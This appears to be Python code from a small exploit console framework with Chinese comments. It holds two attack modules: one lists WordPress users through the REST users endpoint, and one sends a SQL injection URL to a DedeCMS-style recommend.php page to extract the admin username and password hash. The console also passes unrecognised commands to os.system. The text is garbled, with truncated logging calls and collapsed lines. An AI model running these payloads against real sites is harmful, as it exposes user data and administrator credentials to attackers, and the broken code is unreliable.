def exploit(self): ''' 漏洞利用的核心代码, 在此函数中完成漏洞利用 '''"Lauching the exploition...") host = self.get_config("remote_host") port = int(self.get_config("remote_port")) url = "http://%s:%d/wp-json/wp/v2/users/" % (host, port) try: response = requests.get(url) if response.status_code == 200: Log.success("Exploit success!") content = response.content print "%s" % (color.cyan("ID\tUser\t\tDescription")) for user in json.loads(content)[::-1]: username = user["name"] if len(username) > 8: print "%s\t%s\t%s" % (user["id"], user["name"], user["description"]) else: print "%s\t%s\t\t%s" % (user["id"], user["name"], user["description"]) return True else: Log.error("Exploit Failed!") return False except Exception as e: Log.error(str(e)) return False
def exploit(self): ''' 漏洞利用的核心代码, 在此函数中完成漏洞利用 '''"Lauching the exploition...") host = self.get_config("remote_host") port = self.get_config("remote_port") url = "http://%s:%d/%s" % (host, port, '''plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294''')"Url: %s" % (url)) try: response = requests.get(url) if response.status_code == 200: content = response.content if "<h2>" not in content: Log.error("Exploit Failed!") return False data = response.content.split("<h2>")[1].split("</h2>")[0].split("\\|") if len(data) != 2: Log.error("Exploit Failed!") return False Log.success("Exploit success!") username = data[0] password = data[1] print "%s" % (color.cyan("Username\tHash")) print "%s" % ("%s\t%s" % (username, password))) return True else: return False except Exception as e: Log.error(str(e)) return False
def main(): signal.signal(signal.SIGINT, signal_handler) signal.signal(signal.SIGTERM, signal_handler) banner.banner() LOCAL_COMMAND_FLAG = True CONTEXT = reset_context() while True: command = (input("[%s]=> " % ( or "help") if command == "h" or command == "help" or command == "?": main_help() elif command == "version":"Version: 0.0.1") elif command == "show": print("%s" % (color.purple("------\t\t------"))) print("%s" % (color.purple("Vendor\t\tModule"))) print("%s" % (color.purple("------\t\t------"))) exploit_path = "./exploit/" vendors = os.listdir(exploit_path) for vendor in vendors: full_path = exploit_path + vendor if os.path.isdir(full_path): #"%s" % ("-" * 0x20)) #"Vendor: %s" % (vendor)) exploit_files = os.listdir(full_path) number = 0 for exploit_file in exploit_files: if exploit_file.endswith(".py") and exploit_file != "": #"%s => exploit.%s.%s" % (exploit_file, vendor, exploit_file.replace(".py", ""))) if len(vendor) > 8: print("%s" % (color.cyan("%s\t%s" % (vendor, exploit_file.replace(".py", ""))))) else: print("%s" % (color.cyan("%s\t\t%s" % (vendor, exploit_file.replace(".py", ""))))) number += 1 #"%d exploits" % (number)) print("%s" % (color.purple("---------"))) print("%s" % (color.purple(" Example"))) print("%s" % (color.purple("---------"))) print("%s" % (color.cyan("use exploit.%s.%s" % (vendor, exploit_file.replace(".py", ""))))) elif command.startswith("use "): module_name = command.split(" ")[1]"Loading module: %s" % (module_name)) try: module = importlib.import_module(module_name) except Exception as e: Log.Log.error(str(e)) continue CONTEXT = module_name exploit = module.Exploit() exploit.show_info()"%s" % ("-" * 0x40)) exploit.show_options() while True: module_command = (input("[%s]=> " % ( or "help") if module_command == "help": main_help() continue if module_command.startswith("set "): if len(module_command.split(" ")) == 3: key = module_command.split(" ")[1] value = module_command.split(" ")[2] exploit.set_config(key, value) else: Log.Log.error("Check your input!")"Example: \n\tset [KEY] [VALUE]") elif module_command == "options": exploit.show_options() elif module_command == "info": exploit.show_info() elif module_command == "exploit": try: exploit.exploit() except Exception as e: Log.Log.error(str(e)) elif module_command == "quit" or module_command == "q" or module_command == "exit" or module_command == "back": break else: main_help() CONTEXT = reset_context() elif command == "q" or command == "quit" or command == "exit":"Quiting...") break else: Log.Log.error("Unsupported function!") if LOCAL_COMMAND_FLAG == True:"Executing command on localhost...") os.system(command)